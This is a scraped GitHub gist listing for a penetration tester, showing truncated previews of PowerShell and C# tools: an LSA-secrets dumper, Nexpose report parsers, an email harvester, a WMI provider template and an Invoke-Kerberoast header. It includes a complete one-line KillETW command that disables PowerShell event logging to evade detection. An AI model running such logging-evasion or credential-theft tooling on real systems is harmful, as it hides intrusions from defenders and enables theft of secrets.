I hereby claim:
- I am 0xbadjuju on github.
- I am 0xbadjuju (https://keybase.io/0xbadjuju) on keybase.
- I have a public key whose fingerprint is 417C 6615 05AC 3D79 778E 61C8 FE58 C646 E956 BA05
To claim this, I am signing this object:
Alexander 0xbadjuju
0xbadjuju
/ Get-LsaSecrets.ps1
Last active
May 20, 2018 02:28
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $Win32Native = @" | |
| using Microsoft.Win32; | |
| using System; | |
| using System.Runtime.InteropServices; | |
| public class Kernel32 | |
| { | |
| const UInt32 TOKEN_ASSIGN_PRIMARY = 0x0001; | |
| const UInt32 TOKEN_DUPLICATE = 0x0002; | |
| const UInt32 TOKEN_IMPERSONATE = 0x0004; | |
| const UInt32 TOKEN_QUERY = 0x0008; |
0xbadjuju
/ nexpose_deprecated_ciphers.ps1
Created
January 11, 2018 14:48
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $xml = [xml]Get-Content "nexpose_report.xml" | |
| ForEach ($node in $xml.NexposeReport.nodes.node) | |
| { | |
| Write-Host $node.address "- SSLv3 and TLS v1.0 Enabled" | |
| ForEach ($endpoint in $node.endpoints.endpoint) | |
| { | |
| Write-Host $node.address":"$endpoint.port | |
0xbadjuju
/ nexpose_weak_ciphers.ps1
Last active
January 11, 2018 14:49
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $xml = [xml]Get-Content "nexpose_report.xml" | |
| ForEach ($node in $xml.NexposeReport.nodes.node) | |
| { | |
| Write-Host $node.address "- Weak Ciphers Supported" | |
| ForEach ($endpoint in $node.endpoints.endpoint) | |
| { | |
| Write-Host $node.address":"$endpoint.port | |
| $output = ForEach($test in $endpoint.services.service.tests.test) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Function Get-EmailsHunter() | |
| { | |
| [CmdletBinding()] | |
| Param( | |
| [Parameter(Mandatory=$True, HelpMessage="Domain to harvest.")] | |
| [String]$Domain, | |
| [Parameter(Mandatory=$True, HelpMessage="https://hunter.io/api_keys")] | |
| [string]$ApiKey | |
| ) | |
| $offset=0; |
0xbadjuju
/ KillETW.ps1
Created
November 17, 2017 01:57
— forked from tandasat/KillETW.ps1
Disable ETW of the current PowerShell session
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # | |
| # This PowerShell command sets 0 to System.Management.Automation.Tracing.PSEtwLogProvider etwProvider.m_enabled | |
| # which effectively disables Suspicious ScriptBlock Logging etc. Note that this command itself does not attempt | |
| # to bypass Suspicious ScriptBlock Logging for readability. | |
| # | |
| [Reflection.Assembly]::LoadWithPartialName('System.Core').GetType('System.Diagnostics.Eventing.EventProvider').GetField('m_enabled','NonPublic,Instance').SetValue([Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider').GetField('etwProvider','NonPublic,Static').GetValue($null),0) |
0xbadjuju
/ .net WMI Provider Template
Last active
April 4, 2022 13:44
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Collections; | |
| using System.Management; | |
| using System.Management.Instrumentation; | |
| using System.Runtime.InteropServices; | |
| using System.Configuration.Install; | |
| /* | |
| * Added references: | |
| * system.configuration.install |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $objWMILocator = new-object -com "WbemScripting.SWbemLocator" | |
| $objWMIService = $objWMILocator.ConnectServer(".","root\cimv2") | |
| $colItems = $objWMIService.ExecQuery("SELECT * FROM Win32_Process") | |
| foreach ($objItem in $colItems) | |
| { | |
| $objItem.GetObjectText_() | |
| } | |
| $objWMILocator = new-object -com "WbemScripting.SWbemLocator" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <# | |
| Invoke-Kerberoast.ps1 | |
| Author: Will Schroeder (@harmj0y), @machosec | |
| License: BSD 3-Clause | |
| Required Dependencies: None | |
| Credit to Tim Medin (@TimMedin) for the Kerberoasting concept and original toolset implementation (https://github.com/nidem/kerberoast). | |
| Note: the primary method of use will be Invoke-Kerberoast with various targeting options. |
0xbadjuju
/ keybase.md
Created
November 12, 2016 21:29
NewerOlder